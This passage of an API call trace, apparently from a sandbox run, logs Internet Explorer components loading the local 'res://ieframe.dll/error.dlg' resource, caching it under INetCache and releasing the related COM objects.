lpflOldProtect=0x199924*=0x4) returned 1 [0159.073] RegisterBindStatusCallback (in: pBC=0x6d8128, pBSCb=0x6ca66c, ppBSCBPrev=0x0, dwReserved=0x0 | out: ppBSCBPrev=0x0) returned 0x0 [0159.073] IUnknown:AddRef (This=0x6ca66c) returned 0x3 [0159.073] IUnknown:QueryInterface (in: This=0x6ca66c, riid=0x703b4814*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x199950 | out: ppvObject=0x199950*=0x6ca62c) returned 0x0 [0159.073] IMoniker:RemoteBindToStorage (in: This=0x613358, pbc=0x6d8128, pmkToLeft=0x0, riid=0x6d6f62cc, ppvObj=0x1999c0 | out: ppvObj=0x1999c0*=0x6b6018) returned 0x0 [0159.073] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.073] IUnknown:QueryInterface (in: This=0x6e784f90, riid=0x703b4794*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1995ac | out: ppvObject=0x1995ac*=0x6e784f9c) returned 0x0 [0159.073] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.073] IInternetProtocolInfo:ParseUrl (in: This=0x6e784f9c, pwzUrl="res://ieframe.dll/error.dlg", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x6d9748, cchResult=0x824, pcchResult=0x1998c0, dwReserved=0x0 | out: pwzResult="", pcchResult=0x1998c0*=0x0) returned 0x800c0011 [0159.074] IUnknown:Release (This=0x6e784f9c) returned 0x1 [0159.074] IUnknown:QueryInterface (in: This=0x6ca66c, riid=0x703b4e24*(Data1=0xaaa74ef9, Data2=0x8ee7, Data3=0x4659, Data4=([0]=0x88, [1]=0xd9, [2]=0xf8, [3]=0xc5, [4]=0x4, [5]=0xda, [6]=0x73, [7]=0xcc)), ppvObject=0x199880 | out: ppvObject=0x199880*=0x6ca66c) returned 0x0 [0159.074] IBindStatusCallbackEx:RemoteGetBindInfoEx (in: This=0x6ca66c, grfBINDF=0x6cab10, pbindinfo=0x6cabd4, pstgmed=0x6cab14, grfBINDF2=0x1998dc, pdwReserved=0x6cabd4 | out: grfBINDF=0x6cab10*=0x483, pbindinfo=0x6cabd4, pstgmed=0x6cab14, grfBINDF2=0x1998dc*=0x0, pdwReserved=0x6cabd4*=0x54) returned 0x0 [0159.074] IUnknown:Release (This=0x6ca66c) returned 0x4 [0159.074] IUnknown:QueryInterface (in: This=0x6ca66c, riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x199800 | out: ppvObject=0x199800*=0x0) returned 0x80004002 [0159.075] IServiceProvider:QueryService (in: This=0x6ca62c, guidService=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x199800 | out: ppvObject=0x199800*=0x0) returned 0x80004002 [0159.075] GetCurrentThreadId () returned 0xb48 [0159.075] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.075] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.075] IBindStatusCallback:OnStartBinding (This=0x6ca66c, dwReserved=0xff, pib=0x6caab0) returned 0x0 [0159.075] IUnknown:AddRef (This=0x6caab0) returned 0x2 [0159.075] IUnknown:AddRef (This=0x6caab0) returned 0x3 [0159.075] IUnknown:QueryInterface (in: This=0x6caab0, riid=0x6d6f6148*(Data1=0xeb5cda44, Data2=0x5086, Data3=0x44fe, Data4=([0]=0xa9, [1]=0xb1, [2]=0xc6, [3]=0x42, [4]=0x13, [5]=0x53, [6]=0xa5, [7]=0x46)), ppvObject=0x199838 | out: ppvObject=0x199838*=0x6caae0) returned 0x0 [0159.076] IUnknown:Release (This=0x6caae0) returned 0x3 [0159.076] IUnknown:QueryInterface (in: This=0x6ca66c, riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x199318 | out: ppvObject=0x199318*=0x0) returned 0x80004002 [0159.076] IServiceProvider:QueryService (in: This=0x6ca62c, guidService=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x199318 | out: ppvObject=0x199318*=0x0) returned 0x80004002 [0159.076] GetCurrentThreadId () returned 0xb48 [0159.076] IUnknown:AddRef (This=0x6e784f90) returned 0x1 [0159.076] IClassFactory:CreateInstance (in: This=0x6e784f90, pUnkOuter=0x6bc880, riid=0x703b4c08*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bc8bc | out: ppvObject=0x6bc8bc*=0xd5c0b0) returned 0x0 [0159.076] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.076] IUnknown:QueryInterface (in: This=0xd5c0b0, riid=0x703b4824*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x6bc914 | out: ppvObject=0x6bc914*=0xd5c0cc) returned 0x0 [0159.077] IUnknown:AddRef (This=0x6bc880) returned 0x7 [0159.077] IUnknown:Release (This=0x6e784f90) returned 0x1 [0159.077] IUnknown:QueryInterface (in: This=0xd5c0cc, riid=0x703b6e5c*(Data1=0x7daf9908, Data2=0x8415, Data3=0x4005, Data4=([0]=0x95, [1]=0xae, [2]=0xbd, [3]=0x27, [4]=0xf6, [5]=0xe3, [6]=0xdc, [7]=0x0)), ppvObject=0x199414 | out: ppvObject=0x199414*=0x0) returned 0x80004002 [0159.077] IUnknown:QueryInterface (in: This=0x6bc880, riid=0x703b6e5c*(Data1=0x7daf9908, Data2=0x8415, Data3=0x4005, Data4=([0]=0x95, [1]=0xae, [2]=0xbd, [3]=0x27, [4]=0xf6, [5]=0xe3, [6]=0xdc, [7]=0x0)), ppvObject=0x199414 | out: ppvObject=0x199414*=0x0) returned 0x80004002 [0159.077] IUnknown:QueryInterface (in: This=0xd5c0b0, riid=0x703b6e5c*(Data1=0x7daf9908, Data2=0x8415, Data3=0x4005, Data4=([0]=0x95, [1]=0xae, [2]=0xbd, [3]=0x27, [4]=0xf6, [5]=0xe3, [6]=0xdc, [7]=0x0)), ppvObject=0x199414 | out: ppvObject=0x199414*=0x0) returned 0x80004002 [0159.077] IUnknown:AddRef (This=0xd5c0cc) returned 0x8 [0159.077] IUnknown:AddRef (This=0x6bc880) returned 0x8 [0159.077] IUnknown:AddRef (This=0xd5c0b0) returned 0x0 [0159.077] IUnknown:QueryInterface (in: This=0xd5c0b0, riid=0x703b6e30*(Data1=0xeb5cda44, Data2=0x5086, Data3=0x44fe, Data4=([0]=0xa9, [1]=0xb1, [2]=0xc6, [3]=0x42, [4]=0x13, [5]=0x53, [6]=0xa5, [7]=0x46)), ppvObject=0x1993c0 | out: ppvObject=0x1993c0*=0x0) returned 0x80004002 [0159.078] IUnknown:QueryInterface (in: This=0xd5c0b0, riid=0x703b4844*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x1993c0 | out: ppvObject=0x1993c0*=0x0) returned 0x80004002 [0159.078] IInternetProtocolRoot:Start (This=0xd5c0cc, szUrl="res://ieframe.dll/error.dlg", pOIProtSink=0x6bc878, pOIBindInfo=0x6bc880, grfPI=0x0, dwReserved=0x0) returned 0x0 [0159.078] IUnknown:AddRef (This=0x6bc878) returned 0x9 [0159.078] IUnknown:AddRef (This=0x6bc880) returned 0xa [0159.078] IInternetBindInfo:GetBindInfo (in: This=0x6bc880, grfBINDF=0xd5c0e8, pbindinfo=0xd5c0f0 | out: grfBINDF=0xd5c0e8*=0x1004c3, pbindinfo=0xd5c0f0) returned 0x0 [0159.078] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3c) returned 0x6db550 [0159.079] CreateUri (in: pwzURI="res://ieframe.dll/error.dlg", dwFlags=0x3002b80, dwReserved=0x0, ppURI=0x19706c | out: ppURI=0x19706c*=0x68e1fc) returned 0x0 [0159.079] IUri:GetHost (in: This=0x68e1fc, pbstrHost=0x197070 | out: pbstrHost=0x197070*="ieframe.dll") returned 0x0 [0159.079] CoInternetParseUrl (in: pwzUrl="ieframe.dll", ParseAction=0x13, dwFlags=0x0, pszResult=0x197078, cchResult=0x1000, pcchResult=0x197060, dwReserved=0x0 | out: pszResult="ieframe.dll", pcchResult=0x197060) returned 0x0 [0159.079] SysReAllocString (in: pbstr=0x197070*="ieframe.dll", psz="ieframe.dll" | out: pbstr=0x197070*="ieframe.dll") returned 1 [0159.079] IUri:GetPath (in: This=0x68e1fc, pbstrPath=0x197074 | out: pbstrPath=0x197074*="/error.dlg") returned 0x0 [0159.079] CoInternetParseUrl (in: pwzUrl="/error.dlg", ParseAction=0x13, dwFlags=0x0, pszResult=0x197078, cchResult=0x1000, pcchResult=0x197060, dwReserved=0x0 | out: pszResult="/error.dlg", pcchResult=0x197060) returned 0x0 [0159.080] SysReAllocString (in: pbstr=0x197074*="/error.dlg", psz="/error.dlg" | out: pbstr=0x197074*="/error.dlg") returned 1 [0159.080] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6b5be0 [0159.080] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x6b6598 [0159.080] IsCharSpaceW (wch=0x65) returned 0 [0159.080] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6d8e08 [0159.080] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.080] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x60) returned 0x6ed00000 [0159.081] PathFindFileNameW (pszPath="ieframe.dll") returned="ieframe.dll" [0159.081] StrCmpICW (pszStr1="ieframe.dll", pszStr2="shdoclc.dll") returned -10 [0159.081] StrCmpICW (pszStr1="ieframe.dll", pszStr2="shdoclc") returned -10 [0159.081] FindResourceExW (hModule=0x6ed00000, lpType=0x17, lpName="error.dlg", wLanguage=0x0) returned 0x9d59ad0 [0159.085] LoadResource (hModule=0x6ed00000, hResInfo=0x9d59ad0) returned 0x9e3da8c [0159.086] LockResource (hResData=0x9e3da8c) returned 0x9e3da8c [0159.086] VirtualQuery (in: lpAddress=0x9e3da8c, lpBuffer=0x19905c, dwLength=0x1c | out: lpBuffer=0x19905c*(BaseAddress=0x9e3d000, AllocationBase=0x9d50000, AllocationProtect=0x2, RegionSize=0x9b000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0159.086] SizeofResource (hModule=0x6ed00000, hResInfo=0x9d59ad0) returned 0xcaf [0159.086] CreateAsyncBindCtxEx (in: pbc=0x0, dwOptions=0x0, pBSCb=0x0, pEnum=0x0, ppBC=0x1990d0*=0x0, reserved=0x0 | out: ppBC=0x1990d0*=0x6d80c8) returned 0x0 [0159.087] CreateUri (in: pwzURI="res://ieframe.dll/error.dlg", dwFlags=0x3002b84, dwReserved=0x0, ppURI=0x1990a0 | out: ppURI=0x1990a0*=0x68e1fc) returned 0x0 [0159.087] IUri:GetProperties (in: This=0x68e1fc, pdwFlags=0x1990b8 | out: pdwFlags=0x1990b8*=0x29b57) returned 0x0 [0159.087] IUnknown:QueryInterface (in: This=0x68e1fc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19907c | out: ppvObject=0x19907c*=0x68e1fc) returned 0x0 [0159.088] IUnknown:Release (This=0x68e1fc) returned 0x7 [0159.088] IUnknown:AddRef (This=0x68e1fc) returned 0x8 [0159.088] IUri:GetScheme (in: This=0x68e1fc, pdwScheme=0x199044 | out: pdwScheme=0x199044*=0x12) returned 0x0 [0159.088] IUnknown:QueryInterface (in: This=0x68e1fc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x199004 | out: ppvObject=0x199004*=0x68e1fc) returned 0x0 [0159.088] IUnknown:Release (This=0x68e1fc) returned 0x8 [0159.088] IUnknown:AddRef (This=0x68e1fc) returned 0x9 [0159.088] StrCmpICW (pszStr1="ieframe.dll", pszStr2="ieframe.dll") returned 0 [0159.089] IUnknown:Release (This=0x68e1fc) returned 0x8 [0159.089] IUnknown:QueryInterface (in: This=0x68e1fc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19907c | out: ppvObject=0x19907c*=0x68e1fc) returned 0x0 [0159.089] IUnknown:Release (This=0x68e1fc) returned 0x8 [0159.089] IUnknown:AddRef (This=0x68e1fc) returned 0x9 [0159.089] IUnknown:Release (This=0x68e1fc) returned 0x8 [0159.089] IInternetProtocolSink:ReportProgress (This=0x6bc878, ulStatusCode=0x16, szStatusText="text/html") returned 0x0 [0159.090] IBindStatusCallback:OnProgress (This=0x6ca66c, ulProgress=0x0, ulProgressMax=0x0, ulStatusCode=0xd, szStatusText="text/html") returned 0x0 [0159.091] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.WINSOCK_ACTIVITY") returned 0xc0f7 [0159.091] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.SET_CONNECTOID_NAME") returned 0xc0f8 [0159.091] RegisterClipboardFormatW (lpszFormat="Microsoft.Webcheck.Dialmon.IEXPLORER_EXITING") returned 0xc0f9 [0159.091] FindWindowW (lpClassName="MS_AutodialMonitor", lpWindowName=0x0) returned 0x0 [0159.091] FindWindowW (lpClassName="MS_WebCheckMonitor", lpWindowName=0x0) returned 0x30020 [0159.091] PostMessageW (hWnd=0x30020, Msg=0xc0f7, wParam=0x0, lParam=0x0) returned 1 [0159.092] IBindCtx:GetObjectParam (in: This=0x6d8128, pszKey="__DWNBINDINFO", ppunk=0x198ed8 | out: ppunk=0x198ed8*=0x0) returned 0x80004005 [0159.092] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6d8b88 [0159.092] StrChrW (lpStart="text/html", wMatch=0x3b) returned 0x0 [0159.092] StrCmpNICW (lpStr1="text/", lpStr2="text/", nChar=5) returned 0 [0159.092] IUnknown:Release (This=0x68e1fc) returned 0x7 [0159.092] IUnknown:Release (This=0x68e1fc) returned 0x6 [0159.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="res://ieframe.dll/error.dlg", cchWideChar=-1, lpMultiByteStr=0x198c48, cbMultiByte=519, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="res://ieframe.dll/error.dlg", lpUsedDefaultChar=0x0) returned 28 [0159.093] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0159.093] LoadLibraryExA (lpLibFileName="WININET.dll", hFile=0x0, dwFlags=0x0) returned 0x701a0000 [0159.094] GetProcAddress (hModule=0x701a0000, lpProcName="CreateUrlCacheEntryA") returned 0x702812a0 [0159.094] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19899c | out: lpflOldProtect=0x19899c*=0x4) returned 1 [0159.095] CreateUrlCacheEntryA (in: lpszUrlName="res://ieframe.dll/error.dlg", dwExpectedFileSize=0xcaf, lpszFileExtension=0x0, lpszFileName="", dwReserved=0x0 | out: lpszFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\YPFIZL51\\error[1]") returned 1 [0159.102] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\YPFIZL51\\error[1]") returned 84 [0159.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x198e60, cbMultiByte=85, lpWideCharStr=0x199130, cchWideChar=260 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\YPFIZL51\\error[1]") returned 85 [0159.102] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\YPFIZL51\\error[1]" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\ie\\ypfizl51\\error[1]"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x650 [0159.103] WriteFile (in: hFile=0x650, lpBuffer=0x9e3da8c*, nNumberOfBytesToWrite=0xcaf, lpNumberOfBytesWritten=0x1990c4, lpOverlapped=0x0 | out: lpBuffer=0x9e3da8c*, lpNumberOfBytesWritten=0x1990c4*=0xcaf, lpOverlapped=0x0) returned 1 [0159.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="res://ieframe.dll/error.dlg", cchWideChar=-1, lpMultiByteStr=0x198a1c, cbMultiByte=519, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="res://ieframe.dll/error.dlg", lpUsedDefaultChar=0x0) returned 28 [0159.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\YPFIZL51\\error[1]", cchWideChar=-1, lpMultiByteStr=0x198e4c, cbMultiByte=519, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\YPFIZL51\\error[1]", lpUsedDefaultChar=0x0) returned 85 [0159.105] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0159.110] GetProcAddress (hModule=0x701a0000, lpProcName="CommitUrlCacheEntryA") returned 0x70281d50 [0159.111] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x198974 | out: lpflOldProtect=0x198974*=0x4) returned 1 [0159.111] CommitUrlCacheEntryA (lpszUrlName="res://ieframe.dll/error.dlg", lpszLocalFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\YPFIZL51\\error[1]", ExpireTime=0x0, LastModifiedTime=0x0, CacheEntryType=0x0, lpHeaderInfo=0x0, dwHeaderSize=0x1, lpszFileExtension=0x0, lpszOriginalUrl=0x0) returned 1 [0159.113] IInternetProtocolSink:ReportProgress (This=0x6bc878, ulStatusCode=0xe, szStatusText="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\YPFIZL51\\error[1]") returned 0x0 [0159.113] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.113] GetProcessHeap () returned 0x5e0000 [0159.113] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xcaf) returned 0x6ddfb8 [0159.113] memcpy_s (in: _Destination=0x6ddfb8, _DestinationSize=0xcaf, _Source=0x9e3da8c, _SourceSize=0xcaf | out: _Destination=0x6ddfb8) returned 0x0 [0159.113] IInternetProtocolSink:ReportData (This=0x6bc878, grfBSCF=0xd, ulProgress=0xcaf, ulProgressMax=0xcaf) returned 0x0 [0159.113] IInternetProtocol:Read (in: This=0xd5c0cc, pv=0x6db7a8, cb=0x2000, pcbRead=0x198f50 | out: pv=0x6db7a8, pcbRead=0x198f50*=0xcaf) returned 0x0 [0159.113] IBindStatusCallback:OnProgress (This=0x6ca66c, ulProgress=0xcaf, ulProgressMax=0xcaf, ulStatusCode=0x4, szStatusText="res://ieframe.dll/error.dlg") returned 0x0 [0159.113] QueryPerformanceCounter (in: lpPerformanceCount=0x198e90 | out: lpPerformanceCount=0x198e90*=3097793234300) returned 1 [0159.113] QueryPerformanceCounter (in: lpPerformanceCount=0x198e58 | out: lpPerformanceCount=0x198e58*=3097793243822) returned 1 [0159.115] IBindStatusCallback:OnProgress (This=0x6ca66c, ulProgress=0xcaf, ulProgressMax=0xcaf, ulStatusCode=0xe, szStatusText="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\YPFIZL51\\error[1]") returned 0x0 [0159.115] GetCurrentProcessId () returned 0xe14 [0159.115] IBindCtx:GetObjectParam (in: This=0x6d8128, pszKey="__DWNBINDINFO", ppunk=0x198e98 | out: ppunk=0x198e98*=0x0) returned 0x80004005 [0159.115] IBindStatusCallback:OnProgress (This=0x6ca66c, ulProgress=0xcaf, ulProgressMax=0xcaf, ulStatusCode=0x6, szStatusText="res://ieframe.dll/error.dlg") returned 0x0 [0159.115] QueryPerformanceCounter (in: lpPerformanceCount=0x198e90 | out: lpPerformanceCount=0x198e90*=3097793451477) returned 1 [0159.116] IInternetProtocol:LockRequest (This=0xd5c0cc, dwOptions=0x0) returned 0x0 [0159.116] IBindStatusCallback:RemoteOnDataAvailable (This=0x6ca66c, grfBSCF=0x5, dwSize=0xcaf, pFormatetc=0x6d9760, pStgmed=0x6d9528) returned 0x0 [0159.116] IUnknown:AddRef (This=0x6d9748) returned 0x5 [0159.116] IUnknown:AddRef (This=0x6b6018) returned 0x3 [0159.116] IUnknown:QueryInterface (in: This=0x6caab0, riid=0x6d6fe90c*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x197290 | out: ppvObject=0x197290*=0x0) returned 0x80004002 [0159.116] IUnknown:QueryInterface (in: This=0xd5c0b0, riid=0x6d6fe90c*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x197264 | out: ppvObject=0x197264*=0x0) returned 0x80004002 [0159.116] IUnknown:QueryInterface (in: This=0x6caab0, riid=0x6d6fe934*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1972a0 | out: ppvObject=0x1972a0*=0x0) returned 0x80004002 [0159.116] IUnknown:QueryInterface (in: This=0xd5c0b0, riid=0x6d6fe934*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x197264 | out: ppvObject=0x197264*=0x0) returned 0x80004002 [0159.116] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x200c) returned 0x9ee2050 [0159.118] IInternetProtocol:Read (in: This=0xd5c0cc, pv=0x9ee2d0b, cb=0x1351, pcbRead=0x198d98 | out: pv=0x9ee2d0b, pcbRead=0x198d98*=0x0) returned 0x1 [0159.118] IInternetProtocol:Read (in: This=0xd5c0cc, pv=0x9ee2d0b, cb=0x1351, pcbRead=0x198d98 | out: pv=0x9ee2d0b, pcbRead=0x198d98*=0x0) returned 0x1 [0159.118] IUnknown:AddRef (This=0x6b6018) returned 0x4 [0159.119] IUnknown:AddRef (This=0x6d9748) returned 0x5 [0159.119] IUnknown:AddRef (This=0x6caab0) returned 0x7 [0159.119] IUnknown:Release (This=0x6caab0) returned 0x6 [0159.119] IUnknown:Release (This=0x6caab0) returned 0x5 [0159.119] IUnknown:AddRef (This=0x68e73c) returned 0x1c [0159.119] IUri:GetScheme (in: This=0x68e73c, pdwScheme=0x198e8c | out: pdwScheme=0x198e8c*=0x12) returned 0x0 [0159.119] IUnknown:Release (This=0x68e73c) returned 0x1b [0159.119] IBindStatusCallback:OnStopBinding (This=0x6ca66c, hresult=0x0, szError=0x0) returned 0x0 [0159.119] IBinding:RemoteGetBindResult (in: This=0x6caab0, pclsidProtocol=0x198ef4, pdwResult=0x198ee4, pszResult=0x198eec, dwReserved=0x0 | out: pclsidProtocol=0x198ef4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), pdwResult=0x198ee4*=0x0, pszResult=0x198eec*=0x0) returned 0x0 [0159.119] IUri:GetScheme (in: This=0x68e73c, pdwScheme=0x198ed4 | out: pdwScheme=0x198ed4*=0x12) returned 0x0 [0159.120] IUri:GetSchemeName (in: This=0x68e73c, pbstrSchemeName=0x198ed8 | out: pbstrSchemeName=0x198ed8*="res") returned 0x0 [0159.120] _wcsnicmp (_String1="res", _String2="mhtml", _MaxCount=0x5) returned 5 [0159.120] CoTaskMemFree (pv=0x0) [0159.120] IInternetProtocolSink:ReportResult (This=0x6bc878, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0 [0159.120] IInternetProtocolRoot:Terminate (This=0xd5c0cc, dwOptions=0x0) returned 0x0 [0159.120] IUnknown:Release (This=0x6bc880) returned 0x9 [0159.120] IUnknown:Release (This=0x6bc878) returned 0x8 [0159.121] ReleaseBindInfo (pbindinfo=0xd5c0f0) [0159.121] FreeLibrary (hLibModule=0x6ed00000) returned 1 [0159.121] CloseHandle (hObject=0x650) returned 1 [0159.122] IUnknown:Release (This=0x6d80c8) returned 0x0 [0159.122] CoTaskMemFree (pv=0x0) [0159.122] IUnknown:Release (This=0xd5c0cc) returned 0x6 [0159.123] IUnknown:Release (This=0x6bc880) returned 0x6 [0159.123] IUnknown:Release (This=0xd5c0b0) returned 0x1 [0159.123] IUnknown:Release (This=0x6b6018) returned 0x1 [0159.123] IUnknown:Release (This=0x68e73c) returned 0x19 [0159.123] IUnknown:Release (This=0x6ce708) returned 0x1 [0159.123] IUnknown:Release (This=0x68e73c) returned 0x18 [0159.123] IUnknown:Release (This=0x68e73c) returned 0x17 [0159.123] CoTaskMemFree (pv=0x0) [0159.123] GetCurrentThreadId () returned 0xb48 [0159.123] GetCurrentProcessId () returned 0xe14 [0159.123] GetCurrentThreadId () returned 0xb48 [0159.123] memcpy_s (in: _Destination=0x199cfc, _DestinationSize=0xc, _Source=0xd436e0, _SourceSize=0xc | out: _Destination=0x199cfc) returned 0x0 [0159.123] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x38) returned 0x6c8598 [0159.124] MulDiv (nNumber=3247, nNumerator=4000, nDenominator=3247) returned 4000 [0159.124] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.124] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.124] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.124] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6d8b68 [0159.124] IUnknown:QueryInterface (in: This=0x6caab0, riid=0x6d754d44*(Data1=0xf3d8f080, Data2=0xa5eb, Data3=0x476f, Data4=([0]=0x9d, [1]=0x19, [2]=0xa5, [3]=0xef, [4]=0x24, [5]=0xe5, [6]=0xc2, [7]=0xe6)), ppvObject=0x199cb8 | out: ppvObject=0x199cb8*=0x6caad0) returned 0x0 [0159.125] IUnknown:QueryInterface (in: This=0xd5c0cc, riid=0x703b51f4*(Data1=0xf3d8f080, Data2=0xa5eb, Data3=0x476f, Data4=([0]=0x9d, [1]=0x19, [2]=0xa5, [3]=0xef, [4]=0x24, [5]=0xe5, 